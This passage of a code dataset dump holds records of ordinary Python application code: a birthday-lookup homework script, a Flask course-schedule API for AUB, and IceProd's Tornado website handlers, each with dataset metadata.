'21/04/1997'\n },\n {\n 'name': 'Gayeon',\n 'bday': '24/09/1997'\n },\n]\n}\n\n\n# Load\ndef load():\n if open('friends.json') is not None:\n with open('friends.json') as in_f:\n return json.load(in_f)\n\n\n# Save\ndef save():\n with open('friends.json', 'w') as out_f:\n json.dump(friends, out_f)\n\n\n# Find the key and return value\ndef find(name):\n for key in friends['friends']:\n if key['name'] == name:\n return key['bday']\n return print(\"Enter name correctly\")\n\n\nsave()\nfriends = load()\nwhile True:\n print('---------------------------')\n name = input('Enter name for searching(enter 0 for terminate): ')\n if name == '0':\n save()\n break\n else:\n print(find(name))\n add = input('Want to add your friend(type yes if you want) ')\n if add == 'yes':\n input_name = input('Enter the name for updating: ')\n input_bday = input('Enter the birthday for updating: ')\n friends['friends'].append(\n {\n 'name': input_name,\n 'bday': input_bday\n }\n )\n save()", "sub_path": "Homework1,2,3/Homework_1_birthday/project_2.py", "file_name": "project_2.py", "file_ext": "py", "file_size_in_byte": 1248, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "json.load", "line_number": 25, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "299039699", "text": "from time import time\nfrom flask.helpers import make_response\nimport requests\nimport re\nfrom flask import Blueprint, current_app, request, jsonify\nfrom requests.api import get\nfrom services import mongo\nfrom bson import json_util\nfrom utils import queryFromArgs, bsonify, bsonifyList, prepQuery\nimport json\nimport users\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\nfrom datetime import datetime as dt, tzinfo\nfrom datetime import timedelta \nimport pytz\n\nbp = Blueprint('courses', __name__)\n\ndb = mongo.get_default_database()\n\ncourses_col = db['courses_collection']\n\n# Constants\nurl= \"https://www-banner.aub.edu.lb/catalog/\"\nschedByLetters = [\n \"schd_A.htm\", \n \"schd_B.htm\", \n \"schd_C.htm\", \n \"schd_D.htm\", \n \"schd_E.htm\", \n \"schd_F.htm\", \n \"schd_G.htm\", \n \"schd_H.htm\", \n \"schd_I.htm\", \n \"schd_J.htm\", \n \"schd_K.htm\", \n \"schd_L.htm\", \n \"schd_M.htm\", \n \"schd_N.htm\", \n \"schd_O.htm\", \n \"schd_P.htm\", \n \"schd_Q.htm\", \n \"schd_R.htm\", \n \"schd_S.htm\", \n \"schd_T.htm\", \n \"schd_U.htm\", \n \"schd_V.htm\", \n \"schd_W.htm\", \n \"schd_X.htm\", \n \"schd_Y.htm\", \n \"schd_Z.htm\", \n]\n\ndef _getHTML(base,endpoint):\n response = requests.get(base+endpoint)\n html = str(response.content)\n return html\n\ndef _getClassesFromPage(html):\n pattern = \"[^<]*<\\/TD>\"\n results = re.findall(pattern,html)\n\n classes = []\n\n for i in range(0,len(results)-1,37):\n row = results[i:i+37]\n row = [d[4:-5] for d in row ]\n \n classData = {\n 'CRN': row[1],\n 'SUBJECT': row[2],\n 'CODE': row[3],\n 'SECTION': row[4],\n 'ERROR': False\n }\n\n try:\n s1_start = row[11]\n classData['S1_START'] =(int(s1_start[:2]),int(s1_start[2:])) if len(s1_start)==4 else (-1,-1)\n s1_end = row[12]\n\n classData['S1_END'] =(int(s1_end[:2]),int(s1_end[2:])) if len(s1_end)==4 else (-1,-1)\n\n classData['S1_DAYS'] = [ d != '.' for d in row[15:20]]\n\n classData['S1_LOC'] = row[13]+\"-\"+row[14]\n\n s2_start = row[22]\n classData['S2_START'] =(int(s2_start[:2]),int(s2_start[2:])) if len(s2_start)==4 else (-1,-1)\n s2_end = row[23]\n classData['S2_END'] =(int(s2_end[:2]),int(s2_end[2:])) if len(s2_end)==4 else (-1,-1)\n\n classData['S2_DAYS'] = [ d != '.' for d in row[26:33]]\n classData['S2_LOC'] = row[24]+\"-\"+row[25]\n except:\n classData['ERROR'] = True\n print(i//37)\n\n\n classes.append(classData)\n \n return classes\n\ndef getClasses(url, endpoints):\n classes = []\n for s in schedByLetters:\n html = _getHTML(url,s)\n if s == 'schd_C.htm':\n html = html.replace(\"30761<\\\\n/TD>\",\"30761\",1)\n \n classes+=_getClassesFromPage(html)\n return classes\n \n\ndef initCoursesDB():\n\n courses_col.delete_many({})\n\n classes = getClasses(url, schedByLetters)\n print(\"LOADED COURSES FROM AUB\")\n #courses_col.delete_many({})\n for cl in classes:\n courses_col.insert_one(cl)\n\n\ndef _getCourseByCRN(CRN):\n return courses_col.find_one({'CRN': CRN})\n\n@bp.route('/byCRN/')\n#@jwt_required()\ndef getCourseByCRN(CRN):\n course = _getCourseByCRN(CRN)\n\n if course:\n return jsonify(bsonify(course))\n else:\n return make_response('COURSE NOT FOUND',404)\n\n\n@bp.route('/setCRNs', methods=['POST'])\n@jwt_required()\ndef setCourses():\n userID = get_jwt_identity()\n \n data = request.json\n\n ls = [] \n for course in data['classes']:\n if re.fullmatch('[0-9]{5}',course):\n ls.append(course)\n else:\n return make_response('WRONG CRNS',400)\n \n users.updateUsers({'_id':userID}, {'classes':ls})\n\n return json.dumps({'success':True}), 200, {'ContentType':'application/json'} \n\ndef _getCourseMeetingLink(CRN):\n\n user = users.queryUsers({'_id': get_jwt_identity()})[0]\n\n if 'link' not in user:\n return None\n else:\n return user['link'].get(CRN, None)\n\ndef _setCourseMeetingLink(CRN, link):\n\n user = users.queryUsers({'_id': get_jwt_identity()})[0]\n links = user.get('link', {})\n links[CRN] = link\n users.updateUsers({'_id': get_jwt_identity()}, {'link': links})\n\n\n\n@bp.route('/byCRN//link' , methods=['POST', 'GET'])\n@jwt_required()\ndef processMeetingLink(CRN):\n\n if request.method == \"GET\":\n link = _getCourseMeetingLink(CRN)\n if link:\n return jsonify({'link':link})\n else:\n return jsonify({})\n \n else:\n _setCourseMeetingLink(CRN, request.json['link'])\n return json.dumps({'success':True}), 200, {'ContentType':'application/json'} \n\n\ndef _getCourseSections(subject, code):\n\n courses = courses_col.find({'SUBJECT': subject, \"CODE\": code})\n\n return [x['CRN'] for x in courses]\n\ndef _getCourses(user):\n user = users.queryUsers({'_id': user})[0]\n\n if 'classes' not in user:\n return []\n else: \n classes = []\n for crn in user['classes']: \n cl = _getCourseByCRN(crn)\n\n if cl:\n classes.append(cl)\n\n return classes\n\n@bp.route('')\n@jwt_required() \ndef getUserCourses():\n return jsonify(bsonifyList(_getCourses(get_jwt_identity())))\n\ndef _getCommonCourses(list1, list2):\n \n set1 = set(list1)\n set2 = set(list2)\n\n commonSections = set1.intersection(set2)\n differentSections1 = set1-commonSections\n differentSections2 = set2-commonSections\n\n courses1 = []\n courses2 = []\n\n for sec in differentSections1:\n course = _getCourseByCRN(sec)\n courses1.append(course['SUBJECT']+\"-\"+course['CODE'])\n\n for sec in differentSections2:\n course = _getCourseByCRN(sec)\n courses2.append(course['SUBJECT']+\"-\"+course['CODE'])\n \n courses1 = set(courses1)\n courses2 = set(courses2)\n\n commonCourses = courses1.intersection(courses2)\n\n response = []\n\n for sec in commonSections:\n course = _getCourseByCRN(sec)\n response.append({\n 'type':'section',\n 'group': sec,\n 'name': course['SUBJECT']+\"-\"+course['CODE']+\"-\"+course['SECTION']\n }) \n \n for course in commonCourses:\n\n response.append(\n {\n 'type':'course',\n 'group': course,\n 'name': course\n }\n )\n\n return response\n\n@bp.route('/common/')\n@jwt_required() \ndef getCommonCourses(otherID):\n\n list1 = users.queryUsers({'_id': get_jwt_identity()})[0]['classes']\n try:\n list2 = users.queryUsers({'_id': otherID})[0]['classes']\n except:\n return make_response(\"USER NOT FOUND\", 404)\n\n return jsonify(_getCommonCourses(list1, list2))\n\n\ndef nextInstanceOfEvent(course, weekday, hour, minute):\n\n del course['_id']\n\n location = _getCourseMeetingLink(course['CRN'])\n\n def datetimeInWeek(weekOffset, weekday, hour, minute):\n\n now = dt.now()\n d = dt(now.year, now.month, now.day, hour, minute, tzinfo = pytz.timezone('Etc/GMT-3'))\n\n d += timedelta(days=-now.weekday() + weekOffset*7+weekday)\n return d\n\n earliest = None\n\n #check for rest of week\n if weekday<=4:\n\n next_dates = []\n\n for i in range(weekday, len(course['S1_DAYS'])):\n\n if course['S1_DAYS'][i]:\n next_dates.append(datetimeInWeek(0,i, course['S1_START'][0], course['S1_START'][1]))\n\n if len(next_dates)==2:\n break\n\n for i in range(weekday, len(course['S2_DAYS'])):\n\n if course['S2_DAYS'][i]:\n next_dates.append(datetimeInWeek(0,i, course['S2_START'][0], course['S2_START'][1]))\n\n if len(next_dates)==4:\n break\n \n next_dates = sorted(next_dates)\n\n now = pytz.utc.localize(dt.now())\n now = now.astimezone(pytz.timezone('Etc/GMT-3'))\n\n while len(next_dates) and next_dates[-1] 4 or earliest == None:\n\n next_dates = []\n\n for i in range(len(course['S1_DAYS'])):\n\n if course['S1_DAYS'][i]:\n #next_dates.append(f'weekday={weekday}, i={i}, today={dt.now().isoformat()}, offset={7-weekday +i}, date={datetimeInWeek(1, i, course[\"S1_START\"][0], course[\"S1_START\"][1])}')\n next_dates.append(datetimeInWeek(1, i, course['S1_START'][0], course['S1_START'][1]))\n\n if len(next_dates)==2:\n break\n\n for i in range(len(course['S2_DAYS'])):\n\n if course['S2_DAYS'][i]:\n #next_dates.append(f'weekday={weekday}, i={i}, date={datetimeInWeek(1, i, course[\"S2_START\"][0], course[\"S2_START\"][1])}')\n next_dates.append(datetimeInWeek(1, i, course['S2_START'][0], course['S2_START'][1]))\n\n if len(next_dates)==4:\n break \n \n next_dates = sorted(next_dates, reverse=True)\n\n if location:\n temp = {'course': course, 'date': next_dates[-1], 'location': location, 'is_online': True}\n else:\n temp = {'course': course, 'date': next_dates[-1], 'location': course['S1_LOC'], 'is_online': False}\n\n if earliest == None or temp['date']`_,\na fast and scalable python web server.\n\nMain website\n------------\n\nThis is the external website users will see when interacting with IceProd.\nIt has been broken down into several sub-handlers for easier maintenance.\n\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\n\nimport sys\nimport os\nimport time\nimport random\nimport binascii\nimport socket\nfrom threading import Thread,Event,Condition\nimport logging\nfrom contextlib import contextmanager\nfrom functools import partial, wraps\ntry:\n from urlparse import urlparse\nexcept ImportError:\n from urllib.parse import urlparse\nfrom datetime import timedelta\nfrom collections import defaultdict\n\nfrom iceprod.core.jsonUtil import json_encode,json_decode\n\nimport tornado.ioloop\nimport tornado.web\nimport tornado.httpserver\nimport tornado.gen\n\nimport tornado.concurrent\nimport concurrent.futures\nfrom rest_tools.client import RestClient\nfrom rest_tools.server import RestServer\n\nimport iceprod\nfrom iceprod.server import GlobalID, get_pkgdata_filename\nfrom iceprod.server import module\nfrom iceprod.server.ssl_cert import create_cert, verify_cert\nimport iceprod.core.functions\nfrom iceprod.server import documentation\n\nlogger = logging.getLogger('website')\n\nclass website(module.module):\n \"\"\"\n The main website module.\n\n Run the website, which is required for anything to work.\n \"\"\"\n\n def __init__(self,*args,**kwargs):\n # run default init\n super(website,self).__init__(*args,**kwargs)\n\n # set up local variables\n self.http_server = None\n\n def stop(self):\n \"\"\"Stop website\"\"\"\n # stop tornado\n try:\n if self.http_server:\n self.http_server.stop()\n except Exception:\n logger.error('cannot stop tornado', exc_info=True)\n super(website,self).stop()\n\n def start(self):\n \"\"\"Run the website\"\"\"\n super(website,self).start()\n\n try:\n # make sure directories are set up properly\n for d in self.cfg['webserver']:\n if '_dir' in d:\n path = self.cfg['webserver'][d]\n path = os.path.expanduser(os.path.expandvars(path))\n try:\n os.makedirs(path)\n except Exception:\n pass\n\n # get package data\n static_path = get_pkgdata_filename('iceprod.server','data/www')\n if static_path is None or not os.path.exists(static_path):\n logger.info('static path: %r',static_path)\n raise Exception('bad static path')\n template_path = get_pkgdata_filename('iceprod.server','data/www_templates')\n if template_path is None or not os.path.exists(template_path):\n logger.info('template path: %r',template_path)\n raise Exception('bad template path')\n\n if 'url' in self.cfg['rest_api']:\n rest_address = self.cfg['rest_api']['url']\n else:\n # for local systems\n rest_address = 'http://{}:{}'.format(\n self.cfg['rest_api']['address'],\n self.cfg['rest_api']['port'],\n )\n\n handler_args = {\n 'cfg':self.cfg,\n 'modules':self.modules,\n 'statsd':self.statsd,\n 'rest_api':rest_address,\n 'debug':True,\n }\n login_handler_args = handler_args.copy()\n login_handler_args['module_rest_client'] = self.rest_client\n if 'debug' in self.cfg['webserver'] and self.cfg['webserver']['debug']:\n handler_args['debug'] = True\n if 'cookie_secret' in self.cfg['webserver']:\n cookie_secret = self.cfg['webserver']['cookie_secret']\n else:\n cookie_secret = ''.join(hex(random.randint(0,15))[-1] for _ in range(64))\n self.cfg['webserver']['cookie_secret'] = cookie_secret\n\n routes = [\n (r\"/\", Default, handler_args),\n (r\"/submit\", Submit, handler_args),\n (r\"/config\", Config, handler_args),\n (r\"/dataset\", DatasetBrowse, handler_args),\n (r\"/dataset/(\\w+)\", Dataset, handler_args),\n (r\"/dataset/(\\w+)/task\", TaskBrowse, handler_args),\n (r\"/dataset/(\\w+)/task/(\\w+)\", Task, handler_args),\n (r\"/dataset/(\\w+)/job\", JobBrowse, handler_args),\n (r\"/dataset/(\\w+)/job/(\\w+)\", Job, handler_args),\n (r\"/help\", Help, handler_args),\n (r\"/docs/(.*)\", Documentation, handler_args),\n (r\"/dataset/(\\w+)/log/(\\w+)\", Log, handler_args),\n #(r\"/groups\", GroupsHandler, handler_args),\n (r'/profile', Profile, handler_args),\n (r\"/login\", Login, login_handler_args),\n (r\"/logout\", Logout, handler_args),\n (r\"/.*\", Other, handler_args),\n ]\n self.http_server = RestServer(\n static_path=static_path,\n template_path=template_path,\n cookie_secret=cookie_secret,\n login_url='/login',\n debug=handler_args['debug'],\n )\n for r in routes:\n self.http_server.add_route(*r)\n\n # start tornado\n self.http_server.startup(\n port=self.cfg['webserver']['port'],\n address='0.0.0.0', # bind to all\n )\n except Exception:\n logger.error('website startup error',exc_info=True)\n raise\n\n\ndef catch_error(method):\n \"\"\"Decorator to catch and handle errors on handlers\"\"\"\n @wraps(method)\n def wrapper(self, *args, **kwargs):\n try:\n return method(self, *args, **kwargs)\n except Exception as e:\n self.statsd.incr(self.__class__.__name__+'.error')\n logger.warning('Error in website handler', exc_info=True)\n message = 'Error generating page for '+self.__class__.__name__\n if self.debug:\n message = message + '\\n' + str(e)\n self.send_error(500, message=message)\n return wrapper\n\ndef authenticated_secure(method):\n \"\"\"Decorate methods with this to require that the user be logged in\n to a secure area.\n\n If the user is not logged in, they will be redirected to the configured\n `login url `.\n\n If you configure a login url with a query parameter, Tornado will\n assume you know what you're doing and use it as-is. If not, it\n will add a `next` parameter so the login page knows where to send\n you once you're logged in.\n \"\"\"\n @wraps(method)\n def wrapper(self, *args, **kwargs):\n if not self.current_user_secure:\n if self.request.method in (\"GET\", \"HEAD\"):\n url = self.get_login_url()\n if \"?\" not in url:\n if urlparse.urlsplit(url).scheme:\n # if login url is absolute, make next absolute too\n next_url = self.request.full_url()\n else:\n next_url = self.request.uri\n url += \"?\" + urlencode({'next':next_url,'secure':True})\n self.redirect(url)\n return\n raise HTTPError(403)\n return method(self, *args, **kwargs)\n return wrapper\n\n\nclass PublicHandler(tornado.web.RequestHandler):\n \"\"\"Default Handler\"\"\"\n def initialize(self, cfg, modules, debug=False, statsd=None,\n rest_api=None):\n \"\"\"\n Get some params from the website module\n\n :param cfg: the global config\n :param modules: modules handle\n :param debug: debug flag (optional)\n :param rest_api: the rest api url\n \"\"\"\n self.cfg = cfg\n self.modules = modules\n self.debug = debug\n self.statsd = statsd\n self.rest_api = rest_api\n self.current_user = None\n self.current_user_secure = None\n self.rest_client = None\n\n def set_default_headers(self):\n self._headers['Server'] = 'IceProd/' + iceprod.__version__\n\n def get_template_namespace(self):\n namespace = super(PublicHandler,self).get_template_namespace()\n namespace['version'] = iceprod.__version__\n namespace['section'] = self.request.uri.lstrip('/').split('?')[0].split('/')[0]\n namespace['master'] = ('master' in self.cfg and\n 'status' in self.cfg['master'] and\n self.cfg['master']['status'])\n namespace['master_url'] = ('master' in self.cfg and\n 'url' in self.cfg['master'] and\n self.cfg['master']['url'])\n namespace['site_id'] = (self.cfg['site_id'] if 'site_id' in self.cfg else None)\n namespace['sites'] = (self.cfg['webserver']['sites'] if (\n 'webserver' in self.cfg and\n 'sites' in self.cfg['webserver']) else None)\n namespace['json_encode'] = json_encode\n return namespace\n\n def prepare(self):\n try:\n data = self.get_secure_cookie(\"user\", max_age_days=1)\n if not data:\n raise Exception('user cookie is missing/empty')\n data = json_decode(data)\n user_secure = self.get_secure_cookie(\"user_secure\", max_age_days=0.01)\n if user_secure is not None and data['username'] != user_secure:\n raise Exception('mismatch between user_secure and username')\n self.current_user = data['username']\n self.current_user_data = data\n self.current_user_secure = (user_secure is not None)\n self.rest_client = RestClient(self.rest_api, data['token'], timeout=50)\n except Exception:\n logger.info('error getting current user', exc_info=True)\n self.clear_cookie(\"user\")\n self.clear_cookie(\"user_secure\")\n self.current_user = None\n\n def write_error(self,status_code=500,**kwargs):\n \"\"\"Write out custom error page.\"\"\"\n self.set_status(status_code)\n if status_code >= 500:\n self.write('

Internal Error

')\n else:\n self.write('

Request Error

')\n if 'message' in kwargs:\n self.write('
'.join(kwargs['message'].split('\\n')))\n elif 'reason' in kwargs:\n self.write('
'.join(kwargs['reason'].split('\\n')))\n elif self._reason:\n self.write('
'.join(self._reason.split('\\n')))\n self.finish()\n\nclass Default(PublicHandler):\n \"\"\"Handle / urls\"\"\"\n @catch_error\n async def get(self):\n self.statsd.incr('default')\n self.render('main.html')\n\nclass Submit(PublicHandler):\n \"\"\"Handle /submit urls\"\"\"\n @catch_error\n @tornado.web.authenticated\n async def get(self):\n logger.info('here')\n self.statsd.incr('submit')\n url = self.request.uri[1:]\n ret = await self.rest_client.request('POST','/create_token')\n token = ret['result']\n groups = []\n logger.info('user_data: %r', self.current_user_data)\n logger.info('token: %r', token)\n if self.current_user_data and 'groups' in self.current_user_data:\n groups = self.current_user_data['groups']\n default_config = {\n \"categories\": [],\n \"dataset\": 0,\n \"description\": \"\",\n \"difplus\": None,\n \"options\": {\n },\n \"parent_id\": 0,\n \"steering\": None,\n \"tasks\": [],\n \"version\": 3\n }\n render_args = {\n 'passkey':token,\n 'edit':False,\n 'dataset_id':'',\n 'config':default_config,\n 'groups':groups,\n 'description':'',\n }\n self.render('submit.html',**render_args)\n\nclass Config(PublicHandler):\n \"\"\"Handle /config urls\"\"\"\n @catch_error\n @tornado.web.authenticated\n async def get(self):\n self.statsd.incr('config')\n dataset_id = self.get_argument('dataset_id',default=None)\n if not dataset_id:\n self.write_error(400,message='must provide dataset_id')\n return\n dataset = await self.rest_client.request('GET','/datasets/{}'.format(dataset_id))\n edit = self.get_argument('edit',default=False)\n if edit:\n ret = await self.rest_client.request('POST','/create_token')\n passkey = ret['result']\n else:\n passkey = None\n config = await self.rest_client.request('GET','/config/{}'.format(dataset_id))\n render_args = {\n 'edit':edit,\n 'passkey':passkey,\n 'dataset_id':dataset_id,\n 'config':config,\n 'description':dataset['description'],\n }\n self.render('submit.html',**render_args)\n\nclass DatasetBrowse(PublicHandler):\n \"\"\"Handle /dataset urls\"\"\"\n @catch_error\n @tornado.web.authenticated\n async def get(self):\n self.statsd.incr('dataset_browse')\n filter_options = {'status':['processing','suspended','errors','complete','truncated']}\n filter_results = {n:self.get_arguments(n) for n in filter_options}\n\n args = []\n for name in filter_results:\n val = filter_results[name]\n if any(v not in filter_options[name] for v in val):\n raise tornado.web.HTTPError(400, reason='Bad filter '+name+' value')\n args.append(name+'='+('|'.join(val)))\n\n url = '/datasets'\n if args:\n url += '?'+('&'.join(args))\n\n ret = await self.rest_client.request('GET', url)\n datasets = sorted(ret.values(), key=lambda x:x['dataset'], reverse=True)\n #logger.info('datasets: %r', datasets)\n self.render('dataset_browse.html',datasets=datasets,\n filter_options=filter_options,\n filter_results=filter_results)\n\nclass Dataset(PublicHandler):\n \"\"\"Handle /dataset urls\"\"\"\n @catch_error\n @tornado.web.authenticated\n async def get(self, dataset_id):\n self.statsd.incr('dataset')\n\n if dataset_id.isdigit():\n try:\n d_num = int(dataset_id)\n if d_num < 10000000:\n all_datasets = await self.rest_client.request('GET','/datasets')\n for d in all_datasets.values():\n if d['dataset'] == d_num:\n dataset_id = d['dataset_id']\n break\n except Exception:\n pass\n try:\n dataset = await self.rest_client.request('GET','/datasets/{}'.format(dataset_id))\n except Exception:\n raise tornado.web.HTTPError(404, reason='Dataset not found')\n dataset_num = dataset['dataset']\n\n ret = await self.rest_client.request('POST','/create_token')\n passkey = ret['result']\n\n jobs = await self.rest_client.request('GET','/datasets/{}/job_counts/status'.format(dataset_id))\n tasks = await self.rest_client.request('GET','/datasets/{}/task_counts/status'.format(dataset_id))\n task_info = await self.rest_client.request('GET','/datasets/{}/task_counts/name_status'.format(dataset_id))\n task_stats = await self.rest_client.request('GET','/datasets/{}/task_stats'.format(dataset_id))\n config = await self.rest_client.request('GET','/config/{}'.format(dataset_id))\n for t in task_info:\n logger.info('task_info[%s] = %r', t, task_info[t])\n for s in ('waiting','queued','processing','complete'):\n if s not in task_info[t]:\n task_info[t][s] = 0\n error = 0\n for s in ('reset','resume','failed'):\n if s in task_info[t]:\n error += task_info[t][s]\n task_info[t]['error'] = error\n for task in config['tasks']:\n if 'name' in task and task['name'] == t:\n task_info[t]['type'] = 'GPU' if 'requirements' in task and 'gpu' in task['requirements'] and task['requirements']['gpu'] else 'CPU'\n break\n else:\n task_info[t]['type'] = 'UNK'\n self.render('dataset_detail.html',dataset_id=dataset_id,dataset_num=dataset_num,\n dataset=dataset,jobs=jobs,tasks=tasks,task_info=task_info,task_stats=task_stats,passkey=passkey)\n\nclass TaskBrowse(PublicHandler):\n \"\"\"Handle /task urls\"\"\"\n @catch_error\n @tornado.web.authenticated\n async def get(self, dataset_id):\n self.statsd.incr('task_browse')\n status = self.get_argument('status',default=None)\n\n if status:\n tasks = await self.rest_client.request('GET','/datasets/{}/tasks?status={}'.format(dataset_id,status))\n for t in tasks:\n job = await self.rest_client.request('GET', '/datasets/{}/jobs/{}'.format(dataset_id, tasks[t]['job_id']))\n tasks[t]['job_index'] = job['job_index']\n ret = await self.rest_client.request('POST','/create_token')\n passkey = ret['result']\n self.render('task_browse.html',tasks=tasks, passkey=passkey)\n else:\n status = await self.rest_client.request('GET','/datasets/{}/task_counts/status'.format(dataset_id))\n self.render('tasks.html',status=status)\n\nclass Task(PublicHandler):\n \"\"\"Handle /task urls\"\"\"\n @catch_error\n @tornado.web.authenticated\n async def get(self, dataset_id, task_id):\n self.statsd.incr('task')\n status = self.get_argument('status',default=None)\n\n ret = await self.rest_client.request('POST','/create_token')\n passkey = ret['result']\n\n dataset = await self.rest_client.request('GET', '/datasets/{}'.format(dataset_id))\n task_details = await self.rest_client.request('GET','/datasets/{}/tasks/{}'.format(dataset_id, task_id))\n task_stats = await self.rest_client.request('GET','/datasets/{}/tasks/{}/task_stats?last=true'.format(dataset_id, task_id))\n if task_stats:\n task_stats = list(task_stats.values())[0]\n try:\n ret = await self.rest_client.request('GET','/datasets/{}/tasks/{}/logs?group=true'.format(dataset_id, task_id))\n logs = ret['logs']\n #logger.info(\"logs: %r\", logs)\n ret2 = await self.rest_client.request('GET','/datasets/{}/tasks/{}/logs?keys=log_id|name|timestamp'.format(dataset_id, task_id))\n logs2 = ret2['logs']\n logger.info(\"logs2: %r\", logs2)\n log_by_name = defaultdict(list)\n for log in sorted(logs2,key=lambda l:l['timestamp'] if 'timestamp' in l else '',reverse=True):\n log_by_name[log['name']].append(log)\n for log in logs:\n log_by_name[log['name']][0] = log\n except Exception:\n log_by_name = {}\n self.render('task_detail.html', dataset=dataset, task=task_details, task_stats=task_stats, logs=log_by_name, passkey=passkey)\n\nclass JobBrowse(PublicHandler):\n \"\"\"Handle /job urls\"\"\"\n @catch_error\n @tornado.web.authenticated\n async def get(self, dataset_id):\n self.statsd.incr('job')\n status = self.get_argument('status',default=None)\n\n ret = await self.rest_client.request('POST','/create_token')\n passkey = ret['result']\n\n jobs = await self.rest_client.request('GET', '/datasets/{}/jobs'.format(dataset_id))\n if status:\n for t in list(jobs):\n if jobs[t]['status'] != status:\n del jobs[t]\n continue\n self.render('job_browse.html', jobs=jobs, passkey=passkey)\n\nclass Job(PublicHandler):\n \"\"\"Handle /job urls\"\"\"\n @catch_error\n @tornado.web.authenticated\n async def get(self, dataset_id, job_id):\n self.statsd.incr('job')\n status = self.get_argument('status',default=None)\n\n ret = await self.rest_client.request('POST','/create_token')\n passkey = ret['result']\n\n dataset = await self.rest_client.request('GET', '/datasets/{}'.format(dataset_id))\n job = await self.rest_client.request('GET', '/datasets/{}/jobs/{}'.format(dataset_id,job_id))\n tasks = await self.rest_client.request('GET','/datasets/{}/tasks?job_id={}'.format(dataset_id,job_id))\n job['tasks'] = list(tasks.values())\n job['tasks'].sort(key=lambda x:x['task_index'])\n self.render('job_detail.html', dataset=dataset, job=job, passkey=passkey)\n\nclass Documentation(PublicHandler):\n @catch_error\n def get(self, url):\n self.statsd.incr('documentation')\n doc_path = get_pkgdata_filename('iceprod.server','data/docs')\n self.write(documentation.load_doc(doc_path+'/' + url))\n self.flush()\n\nclass Log(PublicHandler):\n @catch_error\n @tornado.web.authenticated\n async def get(self, dataset_id, log_id):\n self.statsd.incr('log')\n ret = await self.rest_client.request('GET','/datasets/{}/logs/{}'.format(dataset_id, log_id))\n log_text = ret['data']\n html = '' + ret['name'] + ''\n html += log_text.replace('\\n', '
')\n html += ''\n self.write(html)\n self.flush()\n\nclass Help(PublicHandler):\n \"\"\"Help Page\"\"\"\n @catch_error\n def get(self):\n self.statsd.incr('help')\n self.render('help.html')\n\nclass Other(PublicHandler):\n \"\"\"Handle any other urls - this is basically all 404\"\"\"\n @catch_error\n def get(self):\n self.statsd.incr('other')\n path = self.request.path\n self.set_status(404)\n self.render('404.html',path=path)\n\nclass Profile(PublicHandler):\n \"\"\"Handle user profile page\"\"\"\n @catch_error\n @tornado.web.authenticated\n async def get(self):\n self.statsd.incr('profile')\n ret = await self.rest_client.request('POST','/create_token')\n token = ret['result']\n groups = []\n logger.info('user_data: %r', self.current_user_data)\n logger.info('token: %r', token)\n if self.current_user_data and 'groups' in self.current_user_data:\n groups = self.current_user_data['groups']\n self.render('profile.html', username=self.current_user, groups=groups,\n token=token)\n\nclass Login(PublicHandler):\n \"\"\"Handle the login url\"\"\"\n def initialize(self, module_rest_client, *args, **kwargs):\n \"\"\"\n Get some params from the website module\n\n :param module_rest_client: a REST Client\n \"\"\"\n super(Login, self).initialize(*args, **kwargs)\n self.module_rest_client = module_rest_client\n\n @catch_error\n def get(self):\n self.statsd.incr('login')\n n = self.get_argument('next', default='/')\n secure = self.get_argument('secure', default=None)\n self.clear_cookie(\"user\")\n self.clear_cookie(\"user_secure\")\n self.render('login.html', status=None, next=n)\n\n @catch_error\n async def post(self):\n n = self.get_argument('next', default='/')\n secure = self.get_argument('secure', default=None)\n username = self.get_argument('username')\n password = self.get_argument('password')\n self.clear_cookie(\"user\")\n self.clear_cookie(\"user_secure\")\n try:\n data = await self.module_rest_client.request('POST','/ldap',{'username':username,'password':password})\n cookie = json_encode(data)\n if secure:\n self.set_secure_cookie('user_secure', username, expires_days=0.01)\n self.set_secure_cookie('user', cookie, expires_days=1)\n self.redirect(n)\n except Exception:\n logger.info('failed', exc_info=True)\n self.render('login.html', status='failed', next=n)\n\nclass Logout(PublicHandler):\n @catch_error\n def get(self):\n self.statsd.incr('logout')\n self.clear_cookie(\"user\")\n self.clear_cookie(\"user_secure\")\n self.current_user = None\n self.render('logout.html', status=None)\n", "sub_path": "iceprod/server/modules/website.py", "file_name": "website.py", "file_ext": "py", "file_size_in_byte": 24341, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 50, "usage_type": "call"}, {"api_name": "iceprod.server.module.module", "line_number": 52, "usage_type": "attribute"}, {"api_name": "iceprod.server.module", "line_number": 52, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.path.expandvars", "line_number": 85, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 87, "usage_type": "call"}, {"api_name": "iceprod.server.get_pkgdata_filename", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "iceprod.server.get_pkgdata_filename", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 124, "usage_type": "call"}, {"api_name": "rest_tools.server.RestServer", "line_number": 146, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 168, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse.urlsplit", "line_number": 199, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 199, "usage_type": "name"}, {"api_name": "functools.wraps", "line_number": 193, "usage_type": "call"}, {"api_name": "tornado.ioloop.web", "line_number": 212, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 212, "usage_type": "name"}, {"api_name": "iceprod.__version__", "line_number": 234, "usage_type": "attribute"}, {"api_name": "iceprod.__version__", "line_number": 238, "usage_type": "attribute"}, {"api_name": "iceprod.core.jsonUtil.json_encode", "line_number": 250, "usage_type": "name"}, {"api_name": "iceprod.core.jsonUtil.json_decode", "line_number": 258, "usage_type": "call"}, {"api_name": "rest_tools.client.RestClient", "line_number": 265, "usage_type": "call"}, {"api_name": "tornado.ioloop.web", "line_number": 297, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 297, "usage_type": "name"}, {"api_name": 